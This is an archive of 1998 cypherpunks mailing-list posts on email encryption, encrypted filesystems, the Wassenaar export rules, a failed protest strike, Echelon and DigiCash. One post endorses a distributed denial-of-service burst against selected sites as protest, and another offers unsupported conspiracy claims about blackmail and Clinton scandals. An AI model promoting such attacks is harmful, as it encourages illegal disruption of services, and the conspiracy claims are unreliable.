>> >>     That's a good place to begin, though.  "Would you send a letter to
>> >> someone without an envelope?"  "Then why not put your email in the
>> >> electronic equivalent of one?"
>> >>
>> >> balance.
>> >
>> >Would I send a letter to someone without an envelope?
>> >One word: postcard.
>> 
>> Ahh, but would you tape a check for your phone bill to a postcard? Other
>> than writing a greeting to someone what else do you use a postcard for?
>
>No, I would not tape a phone bill check to a postcard. There is the 
>chance for it to fall off.
>
>There is different methods of sending mail for different levels of
>security and functionality. Some people make it obvious what is inside
>an envelope. (who would not recognize a Christmas card from the
>envelope?) Others make it as bland and normal as possible to
>have it go by without much notice.
>
>It all depends on how secure you want it. Some things you can do
>with what amounts to postcard security.
>
>What amount of security do you want for your email? Would you be
>willing to do something extra for that security?
>
>This type of question is up to each person. How much risk is the
>person willing to take. Each person has the responsibility to
>understand what the risks are and to decide what risks they are
>willing to take.
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 12 Dec 1998 12:11:45 +0800
To: "cypherpunks@toad.com>
Subject: Re: Postcard Debates
In-Reply-To: <199812112135.QAA13074@mailfw2.ford.com>
Message-ID: <3.0.5.32.19981212122138.00a8ccf0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 08:22 PM 12/11/98 -0500, Robert Wenzler wrote:
>
>
>"Wilson, Jamie (J.R.)" wrote:
>> 
>> Back to a previous question: how do we get the public to understand the
>> concept of an "electronic envelope", the ACLU has created a PDF file that
>> prints to a brochure format explaining encryption on a level that even the
>> novice of users can understand.  It is available at
>> http://www.aclu.org/action/tools/crypto.pdf.
>
>Getting that concept across is a slow process. People will want to
>stay with what they are familiar with. Right now, I do not know how
>to familiarize people to accept an electronic envelope.
>

I think the paper letter/envelope analogy is perfectly adequate, and easily
understandable. The difficulty will be with the additional layer that must
be completed. If one of my sisters is representative of anything, it _will_
be a long, hard uphill climb.

A plugin for the gui interface that defaults to encryption for recognized
e-addy's would simplify, and enhance this effort. 

Reeza!


DH Key available on request


	"I swear to tell the truth, 
		the whole truth, 
			and nothing but the truth, 
				just the way the President did."

					--Tim May




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mib <mib@io.com>
Date: Sun, 13 Dec 1998 03:35:49 +0800
To: Michael Hohensee <michael@sparta.mainstream.net>
Subject: Re: CFS & TCFS
In-Reply-To: <19981212092708.C25653@io.com>
Message-ID: <19981212130328.C1996@io.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, Dec 12, 1998 at 05:57:42PM +0000, Michael Hohensee wrote:
> These are just NFS servers.  Do there exist any programs which actually
> keep the contents of the filesystem on your hard-drive encrypted?

ftp://ftp.research.att.com/dist/mab/cfs.announce ...
> CFS pushes encryption services into the Unix(tm) file system.  It supports
> secure storage at the system level through a standard Unix file system
> interface to encrypted files.  Users associate a cryptographic key with the
> directories they wish to protect.  Files in these directories (as well as
> their pathname components) are transparently encrypted and decrypted with the
> specified key without further user intervention; cleartext is never stored on
> a disk or sent to a remote file server.  CFS employs a novel combination of
> DES stream and codebook cipher modes to provide high security with good
> performance on a modern workstation.  CFS can use any available file system
> for its underlying storage without modification, including remote file
> servers such as NFS.  System management functions, such as file backup, work
> in a normal manner and without knowledge of the key.

http://vales.uni.net/tcfs/tcfs-faq.html#Q1.1 ...
> Question 1.1. What is TCFS?
> TCFS is a Transparent Cryptographic File System that is a suitable solution
> to the problem of privacy for distributed file system. By a deeper
> integration between the encryption service and the file system, it results in
> a complete trasparency of use to the user applications. Files are stored in
> encrypted form and are decrypted before they are read. The
> encryption/decryption process takes place on the client machine and thus the
> encryption/decryption key never travels on the network.

- d.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sun, 13 Dec 1998 03:40:20 +0800
To: "Albert P. Franco, II" <apf2@apf2.com>
Subject: Re: German government press release on Wassenaar (fwd)
In-Reply-To: <3.0.3.32.19981212153310.006dc6bc@209.204.247.83>
Message-ID: <199812121828.NAA002.03@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In <3.0.3.32.19981212153310.006dc6bc@209.204.247.83>, on 12/12/98 
   at 03:33 PM, "Albert P. Franco, II" <apf2@apf2.com> said:

>I think the key idea which allows Open Source to be exempted is based on
>the availability to all eyes of the technology--not the legal rights
>attached to the software.

>The fact that the knowledge contained in Open Source software is
>available to all is the key. The legal right to use that knowledge is not
>quite the issue. If the knowledge in the software becomes "common
>knowledge" then defining its (illegal) export becomes extremely
>difficult.

I don't know about the rest of the signing nations but in the US at least
there is the unresolved issue of wether source code = protected free
speech under the 1st Amendment.

Considering the crypto section of the agreement is up for review and a new
vote in the year 2000 it may be that they are waiting to see how this
issue plays out in the courts.

Does anyone know what happened to the EU decision not to implement crypto
restrictions despite US pressures? Does the Wassenaar signify a change in
direction for the EU or do we have two different groups in Europe with
conflicting policies??

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: I smashed a Window and saw... OS/2.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i OS/2 for non-commercial use
Comment: Registered_User_E-Secure_v1.1b1_ES000000
Charset: cp850

wj8DBQE2cqehlHpjA6A1ypsRAtyWAJ9782sKj0hRWAG6AzQRPct5U2mhGwCfTuLl
w8Png1jAQmuiFWOMxKTAyWE=
=r0Dm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Sun, 13 Dec 1998 04:57:29 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Echelon, Diana, Wassenaar
In-Reply-To: <199812121635.LAA05204@smtp0.mindspring.com>
Message-ID: <3672CDBA.3E30C2EA@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





John Young wrote:

> The Wash Post today has picked up the hot European
> story of NSA's file on Princess Diana and linked it to
> the NSA's Echelon program.
>
> This is the first US major media story on Echelon, and its
> connection to privacy invasion of a global celebrity icon
> may do more to get public attention for the vile program
> than any previous investigation and report.

The public's appetite for Echelon will be wetted when they pick up
People magazine and turn to the section where celebrity exploits and
indiscretions are transcripted and given a government stamp of
authenticity, "NSA transcripts licensed for commercial release".

Echelon is a goldmine, and more than a few people are tasked with
exploring it's commercial viability. Clinton-Lewinski phone sex, Israeli
intelligence using their NY publicist links to blackmail US
politicians/Clinton. White House national security staff bursting
Israel's hold on the President through a supremely well engineered
public release of Clinton's indiscretions via the Paula Jones case.
Middle East peace brokered by statesmen promising to keep mum on each
other's transgressions. And, to add a touch of reality, impeachment
hearings to punish the President for lying about spitting gum on the
sidewalk... Books, movies and future governments are waiting for deals
to be signed. $$$

Echelon's a goldmine gentlemen, and Diana and Wassenaar are the first
hints of its commercial release. Voyeuristic history will be Echelon's
legacy, the NSA will soon become the largest contributor to the National
Archive and the booming entertainment economy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Sat, 12 Dec 1998 23:21:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: German government press release on Wassenaar (fwd)
Message-ID: <3.0.3.32.19981212153310.006dc6bc@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/plain



I think the key idea which allows Open Source to be exempted is based on
the availability to all eyes of the technology--not the legal rights
attached to the software.

The fact that the knowledge contained in Open Source software is available
to all is the key. The legal right to use that knowledge is not quite the
issue. If the knowledge in the software becomes "common knowledge" then
defining its (illegal) export becomes extremely difficult.

>From this point of view, I agree with the author of the original
statement--this could be a very important boost for Open Source crypto.

APF

>Forwarded message:
>
>> Date: Fri, 11 Dec 1998 22:50:04 +0100
>> From: Alexander Kjeldaas <astor@guardian.no>
>> Subject: Re: German government press release on Wassenaar
>
>> I applied for an examination of the Open Source definition to the
>> department for foreign affairs in Norway.  The response (no surprise)
>> was that Open Source is compliant with what the Wassenaar-agreement
>> calls "public domain" software.
>
>Actualy that is surprising since Open Sourse does not imply the loss of
>rights by the author as public domain does.
>
>If this is so and Germany interprets Open Source in this way then the OS
>movement will fail in Germany (at least). There will be no motive for
>authors to release their work since they will be in effect releasing all
>rights to it, not the goal of OS at all. The impact on this for closed source
>derivitive products is also of some interest.
>
>I wonder what RMS will have to say on that one...
>
>
>    ____________________________________________________________________
>
>          What raises the standard of living may well diminish the
>          quality of life.
>
>                                                 The Club of Rome
>
>       The Armadillo Group       ,::////;::-.          James Choate
>       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>       www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                           -====~~mm-'`-```-mm --'-
>    --------------------------------------------------------------------
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Sat, 12 Dec 1998 23:17:52 +0800
To: Alan Olsen <mikeg@soonernet.com
Subject: Re: Linux Encrypted File Sytem
In-Reply-To: <XFMail.981211124103.mikeg@soonernet.com>
Message-ID: <19981212154326.B30941@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Dec 11, 1998 at 09:10:36PM -0800, Alan Olsen wrote:
> 
> Note: I have not been able to get these to compile cleanly.  It may take
> some work to get them to work right.  (I know of at least one typo in
> devices/block/loop_gen.c that prevents it from compiling on the patch for
> 2.1.131.)

2.1.131.1 is broken.  2.1.131.3 should compile.

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <michael@sparta.mainstream.net>
Date: Sun, 13 Dec 1998 02:28:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CFS & TCFS (was Re: Linux Encrypted File System)
In-Reply-To: <19981212092708.C25653@io.com>
Message-ID: <3672AE96.D05C639C@sparta.mainstream.net>
MIME-Version: 1.0
Content-Type: text/plain



These are just NFS servers.  Do there exist any programs which actually
keep the contents of the filesystem on your hard-drive encrypted?

mib wrote:
> 
> If you are running Red Hat Linux and want the Cryptographic File System (also
> available for most BSD-derived Unix systems and most current Linux releases),
> go to http://www.replay.com/redhat/cfs.html
> 
> If you are running Linux 2.0.X and want the Transparent Cryptographic File
> System (improves on Matt Blaze's CFS, they say), go to
> http://vales.uni.net/tcfs/
> 
> - d.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <michael@sparta.mainstream.net>
Date: Sun, 13 Dec 1998 03:44:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CFS & TCFS
In-Reply-To: <19981212092708.C25653@io.com>
Message-ID: <3672C428.C2117E@sparta.mainstream.net>
MIME-Version: 1.0
Content-Type: text/plain



Ok, so that was an especially clueless question for me to have asked. 
Oh well. :)

mib wrote:
> 
> On Sat, Dec 12, 1998 at 05:57:42PM +0000, Michael Hohensee wrote:
> > These are just NFS servers.  Do there exist any programs which actually
> > keep the contents of the filesystem on your hard-drive encrypted?
> 
> ftp://ftp.research.att.com/dist/mab/cfs.announce ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 15 Dec 1998 17:26:12 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: I Got Mine
In-Reply-To: <3.0.1.32.19981208173418.0072b52c@pop3.idt.net>
Message-ID: <3.0.5.32.19981213140727.00bc6cd0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:56 PM 12/8/98 -0800, Tim May wrote:
>Not much you can say to them while standing out in the cold, in any case.
>(Surely you will not invite them into your home! 

It does somewhat resemble inviting vampires into your home,
in that it's a bad idea, they can do whatever they want when
they're there, and they won't leave until they feel like it.
On the other hand, vampires usually can't get search warrants,
while police usually can. :-)

A while back, maybe 5 years ago, I posted a copy of an article
called "Don't talk to cops" or "Don't talk to police",
which may still be in the archives somewhere.  
Its advice was somewhat New York State oriented, but applies
reasonably generally throughout the US for the case of
police coming to your home (car searches are different,
and vary far more by state.)

>Maybe not even confirming my name...after all, I'm not driving and they
>can't compell me to produce a driver's license.

Not true in California.  If you *possess* a California Driver's License, 
and have it on your person, and a California cop asks you to produce it, 
you are required to do so, even if you're not driving.  
You're not required to carry it if you're not driving,
but if you are carrying it, you've got to fork it over.
This may not apply if you're on your own property - I don't think that 
that variant has been tested in court.
But if you're on public property, you've got to provide it.

If you live in other states, it's worth knowing the local regs
about such things as well.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Glave <james@wired.com>
Date: Tue, 15 Dec 1998 00:23:55 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Anyone Striking?
In-Reply-To: <Pine.SOL.4.05.9812100902510.28323-100000@ultra1-224wi.eos.ncsu.edu>
Message-ID: <199812141529.HAA27041@hardly.hotwired.com>
MIME-Version: 1.0
Content-Type: text/plain



Anyone participating in the strike today? I'd like to possibly visit this
with a news story...

jtg

At 03:10 PM 12/10/98 -0500, Robert Hettinga wrote:
>At 9:05 AM -0500 on 12/10/98, Ken Williams wrote:
>
>> "Strike to protest Wassenaar!"
>>
>> URL:  http://www.zanshin.com/~bobg/
>>
>> "This is a global call for computer professionals to strike on
>> Monday, 14 December, 1998 to protest the signing of the Wassenaar
>> Arrangement, an international treaty that imposes new restrictions
>> on cryptographic software technology.
>
>Now, *this* is interesting...
>
>Anyone actually contemplating doing this?


James Glave, News Editor, Wired News, http://www.wired.com  +1 (415) 276-8430




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Igor Chudov <ichudov@www.video-collage.com>
Date: Mon, 14 Dec 1998 23:27:44 +0800
To: cypherpunks-outgoing@www.video-collage.com
Subject: test
Message-ID: <199812141448.JAA21199@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain


test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Igor Chudov <ichudov@www.video-collage.com>
Date: Tue, 15 Dec 1998 00:08:52 +0800
To: cypherpunks-outgoing@www.video-collage.com
Subject: test1
Message-ID: <199812141520.KAA22634@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain


test1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 15 Dec 1998 03:48:51 +0800
To: "Gomes, Carlos" <james@wired.com>
Subject: RE: Anyone Striking?
In-Reply-To: <59816DD7DAE9D11184E400104B66A353853107@cobra.netsolve.net>
Message-ID: <v03130305b29b0a6c742b@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:29 AM -0800 12/14/98, Gomes, Carlos wrote:
>Even http://www.openpgp.net is still up and operational.  I agree with Perry
>M. and Jim C. that the concept was good but the timetable was unfortunately
>unrealistic.  I've not run across any strike pages.

A foolish idea, that little "strike." Something out of the lefty sixties.
Grape boycotts and all that nonsense.

Clearly the Wassenaar folks will be so influenced by a few thousands
computer users withdrawing from the Net for one frigging day that they will
rethink their Orwellian plans and will admit their crimes in an orgy of
self-criticism.

Give me a fucking break.

The _only_ motivation was to induce journalists to give the think a few
column inches, if even that. "Hundreds of geeks cut their noses off to
spite their faces...details on page 75."

Exporting PGP within minutes of its release...now _that's_ a meaningful
action! (And one which Cypherpunks continue to be good at.)

Let's leave the "National Solidarity Against Racist Policies" crapola to
the lefties.

--Tim May

Y2K -- LMGALMAO -- Loading my guns and laughing my ass off
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cyphrpnk@rainbow.thinkthink.com
Date: Tue, 15 Dec 1998 03:32:59 +0800
To: cypherpunks@cyberpass.net
Subject: Some sites are...!!
Message-ID: <199812141853.KAA05212@rainbow.thinkthink.com>
MIME-Version: 1.0
Content-Type: text/plain



--------

Some of us were in a position to make the switch...
www.first-ecache.com
www.donpablocigars.com
www.permutation.net

    Service will resume as normal at 2400 monday PST

      cheers
       Gwen Hastings
        Web weaver for above sites




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Dec 1998 01:18:20 +0800
To: James Glave <james@wired.com>
Subject: Re: Anyone Striking?
In-Reply-To: <v04020a19b295d9b960d3@[139.167.130.248]>
Message-ID: <v04020a25b29ae69faa0f@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:29 AM -0500 on 12/14/98, James Glave wrote:


> Anyone participating in the strike today?

Evidently not...

Cheers,
Robert Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 15 Dec 1998 00:55:14 +0800
To: James Glave <james@wired.com>
Subject: Re: Anyone Striking?
In-Reply-To: <199812141529.HAA27041@hardly.hotwired.com>
Message-ID: <199812141606.LAA14162@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain




James Glave writes:
> Anyone participating in the strike today? I'd like to possibly visit this
> with a news story...

I find it exceptionally unlikely that many people are participating in
this. Whomever called the thing was not thinking very clearly. You
need at least several weeks notice for such a thing to work, and the
two or three days notice (at most) that was given was way too small. A
strike of this nature might work, but only if someone with political
sense were organizing it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gomes, Carlos" <GomesC@netsolve.net>
Date: Tue, 15 Dec 1998 02:14:53 +0800
To: James Glave <james@wired.com>
Subject: RE: Anyone Striking?
Message-ID: <59816DD7DAE9D11184E400104B66A353853107@cobra.netsolve.net>
MIME-Version: 1.0
Content-Type: text/plain




Even http://www.openpgp.net is still up and operational.  I agree with Perry
M. and Jim C. that the concept was good but the timetable was unfortunately
unrealistic.  I've not run across any strike pages.

me

--
Carlos Macedo Gomes      gomes@netsolve.com       NetSolve, Inc.


> -----Original Message-----
> From: Robert Hettinga [mailto:rah@shipwright.com]
> Sent: Monday, December 14, 1998 10:01 AM
> To: James Glave
> Cc: cypherpunks@toad.com; cryptography@c2.net; dcsb@ai.mit.edu
> Subject: Re: Anyone Striking?
> 
> 
> At 10:29 AM -0500 on 12/14/98, James Glave wrote:
> 
> 
> > Anyone participating in the strike today?
> 
> Evidently not...
> 
> Cheers,
> Robert Hettinga
> -----------------
> Robert A. Hettinga <mailto: rah@philodox.com>
> Philodox Financial Technology Evangelism <http://www.philodox.com/>
> 44 Farquhar Street, Boston, MA 02131 USA
> "... however it may deserve respect for its usefulness and antiquity,
> [predicting the end of the world] has not been found agreeable to
> experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 15 Dec 1998 01:17:44 +0800
To: perry@piermont.com
Subject: Re: Anyone Striking?
In-Reply-To: <199812141606.LAA14162@jekyll.piermont.com>
Message-ID: <36753E2F.9A9306BC@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



"Perry E. Metzger" wrote:
> 
> James Glave writes:
> > Anyone participating in the strike today? I'd like to possibly visit this
> > with a news story...
> 
> I find it exceptionally unlikely that many people are participating in
> this. Whomever called the thing was not thinking very clearly. You
> need at least several weeks notice for such a thing to work, and the
> two or three days notice (at most) that was given was way too small. A
> strike of this nature might work, but only if someone with political
> sense were organizing it.
> 
> Perry

I'm striking.  Likely for more than a week more...


-- 
----------------------------  Kaos Keraunos Kybernetos  -------------------
 + ^ +        Sunder          "The   real aim  of current policy is to /|\
  \|/    sunder@sunder.net    ensure the continued effectiveness of   /\|/\
<--*--> ALLOW FREE EXPORT OF  US information warfare assets against   \/|\/
  /|\   STRONG CRYPTOGRAPHY!  individuals,businesses and governments   \|/
 + v +  PROTEST WASSENAAR!!!  in Europe and elsewhere"  -- Ross Anderson
-- http://www.sunder.net is protesting the Wassenaar Big Brother Attack! --




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William J.Hartwell" <billh@ibag.com>
Date: Tue, 15 Dec 1998 03:45:28 +0800
To: cypherpunks@toad.com
Subject: Re: Anyone Striking?
In-Reply-To: <199812141529.HAA27041@hardly.hotwired.com>
Message-ID: <3.0.5.32.19981214114703.007e68f0@mail.xroads.com>
MIME-Version: 1.0
Content-Type: text/plain



Not striking.....

but I am not working very hard today :-)




At 11:01 AM 12/14/98 -0500, Robert Hettinga wrote:
>At 10:29 AM -0500 on 12/14/98, James Glave wrote:
>
>
>> Anyone participating in the strike today?
>
>Evidently not...
>
>Cheers,
>Robert Hettinga
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>
>
--
					William J. Hartwell
					   (602)987-8436
					  Queencreek, Az.

billh@ibag.com			billh@interdem.com		billh@hartwell.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Tue, 15 Dec 1998 05:16:16 +0800
To: cypherpunks@toad.com
Subject: I must admit. . .
Message-ID: <19981214202550.24462.rocketmail@send101.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I wonder sometimes whether or not there is hope for us to ever stop
this tyrrany.  I've seen a bunch of us diss the strike saying it was
an outlandish and foolish idea, but I hadn't seen anyone of you come
up with something better.  That act of protest, no matter how small,
serves to raise awareness.  Whether it's five minutes after finding
out that a war has errupted, or ten years into the war, each serves
its purpose.  At least it was na idea, it was a start.  We're never
going to be able to do anything at all if we don't start somewhere and
the strike seemed as good an idea as any.  Hopefully we can follow in
the footsteps of our ancestors who fought and died for freedom, true
freedom not this crap we see displayed on the tube everynight.  I hope
we don't fall into that catagorie of the kinds of people that talk and
talk and never do, for if this is the case, then we have already lost
and might as well drive ourselves to the concentration camps.  
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2

iQA/AwUBNnVz81MQ9C083U98EQI68wCfbCa/HA/NN1+u3865z7Oq3m5XvnEAn3kE
wl2adBuq2l21DFm/Isn+5MzK
=uEBu
-----END PGP SIGNATURE-----





==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Lanett" <mlanett@meer.net>
Date: Tue, 15 Dec 1998 05:32:30 +0800
To: <cypherpunks@toad.com>
Subject: Re: Mathematician-to-silicon compilers and the Law
Message-ID: <00a301be27a2$1ccb66f0$010101c0@aboutbox.meer.net>
MIME-Version: 1.0
Content-Type: text/plain



Speaking of carrying... Can I export my theoretical
closed-source-commercial-strong-crypto-using software by printing out the
source at Kinko's, binding it, and flying out of the country? Any company
can afford to set up a 1-person shop in a variety of countries as necessary
(besides you need local ops to distribute and do tech support). Or do
F-O-Speech rights only apply to books published in quantity and that I'm
willing to let anyone read?

[I assume I haven't been paying enough attention; if was this easy then
Wassenaar wouldn't be effective.]

~mark

-----Original Message-----
From: Dutra de Lacerda <dulac@ip.pt>
>How about the best cipher of all?!? The one we carry between our ears?
>(Just proving the illegitimacy of such law attempts)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Dec 1998 02:48:22 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: IBM's Secure Mailer
In-Reply-To: <59816DD7DAE9D11184E400104B66A353853107@cobra.netsolve.net>
Message-ID: <199812141810.NAA25671@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



NYT's Markoff reports on IBMs' release today of 
"Secure Mailer," an open-source platform for what's 
touted to be a superior secure e-mail system
proposed as a global standard for open development. 
It's the work of IBM researcher Wietse Venema.

IBM's description:

   http://jya.com/ibm-secmail.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gomes, Carlos" <GomesC@netsolve.net>
Date: Tue, 15 Dec 1998 04:08:25 +0800
To: James Glave <james@wired.com>
Subject: RE: Anyone Striking?
Message-ID: <59816DD7DAE9D11184E400104B66A35385310A@cobra.netsolve.net>
MIME-Version: 1.0
Content-Type: text/plain




My original statement is a bit off.  I think the past weekend in Dallas is
still with in spirit....

I don't think Jim nor Perry openly advocated the strike so let me chop that
statement.  And as for myself, I was hoping to see something a bit more
active in regards to a protest and I was hoping that the call to strike
would be a start.  The call appears to have been slightly still born if not
horribly premature.  

There were several ideas floating around: a) detach from the net and from
work b) create a signed letter of disapproval published to appropriate orgs
c) _short_ loosely organized burst of DoS against select online targets from
widely distributed sources.

All valid forms of protests (when properly organized and executed) all with
varying forms of impact and visibility.  For the record, I think option c)
could be a valid and effective form of active protest.  It is a form which
has not been used in support of the cpunks' agenda (or many agenda's for
that matter) to date and one that merits a review.

On to the next online skirmish...

regards,
C.G.

--
DISCLAIMER: The above views are mine and not of my employer or coworkers.  I
do not speak as a representative of their views.  Only of my own.


> -----Original Message-----
> From: Tim May [mailto:tcmay@got.net]
> Sent: Monday, December 14, 1998 12:39 PM
> To: Gomes, Carlos; James Glave
> Cc: cypherpunks@toad.com; cryptography@c2.net; dcsb@ai.mit.edu
> Subject: RE: Anyone Striking?
> 
> 
> At 9:29 AM -0800 12/14/98, Gomes, Carlos wrote:
> >Even http://www.openpgp.net is still up and operational.  I 
> agree with Perry
> >M. and Jim C. that the concept was good but the timetable 
> was unfortunately
> >unrealistic.  I've not run across any strike pages.
> 
> A foolish idea, that little "strike." Something out of the 
> lefty sixties.
> Grape boycotts and all that nonsense.
> 
[deletia]
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 15 Dec 1998 06:42:36 +0800
To: cypherpunks@cyberpass.net
Subject: Forced DNA Collection
Message-ID: <199812142047.OAA07639@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Top Story on AP...

NEW YORK (AP) -- Despite objections from civil libertarians, the
city's police commissioner proposed Monday to take a DNA sample along
with the fingerprints of everyone arrested.
 
Commissioner Howard Safir said the test would solve crimes and help
curb repeat offenders. ``The innocents have nothing to fear ... only
if you are guilty should you worry about DNA testing,'' he said.
 
                              ...
 
In Britain, where DNA samples are taken from every suspect, officials
have solved 17 major cases using such data since 1995, according to
the National Institute of Justice Journal.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Dec 1998 04:44:53 +0800
To: cypherpunks@cyberpass.net
Subject: DigiCash Update
Message-ID: <v04020a07b29b1cf034e0@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Scott Loftesness" <scott@loftesness.com>
To: <dbs@philodox.com>
Subject: DigiCash Update
Date: Mon, 14 Dec 1998 10:43:13 -0800
Mime-Version: 1.0
X-Priority: 3 (Normal)
X-Msmail-Priority: Normal
Importance: Normal
X-Mimeole: Produced By Microsoft MimeOLE V4.72.3155.0
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

It's been a while since I've posted an update regarding DigiCash.

As you know, DigiCash Incorporated filed Chapter 11 in early November.
Since that time, over the course of the last several weeks, we've been
engaged in discussions with a number of parties around the potential
acquisition of the DigiCash assets.  These discussions with potential
acquirers are continuing.

We are also exploring other options for DigiCash.  One of these options
involves establishing a more broadly based licensing structure for the
DigiCash intellectual property.  I would welcome those of you who are
specifically interested in licensing the DigiCash IP for your own purposes
to get in touch with me directly (Email is fine -- see below).  Please
specify your particular area of interest in the DigiCash IP when you contact
me.

(Please note that we are well aware of several recommendations for opening
up the DigiCash IP.  These recommendations have been posted on this list as
well as having been discussed with me privately.  We are primarily
interested at this time, however, in ensuring that we are directly aware of
those of you who have a direct licensing interest in the DigiCash IP
specifically for your own purposes.)

Best,
Scott
__________________________________________________________________
Interim CEO
DigiCash Incorporated
2656 E. Bayshore Road
Palo Alto, CA 94303
(650) 798-8183 work
(650) 533-3142 cell
Email: scott@loftesness.com
   or: sjl@digicash.com

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
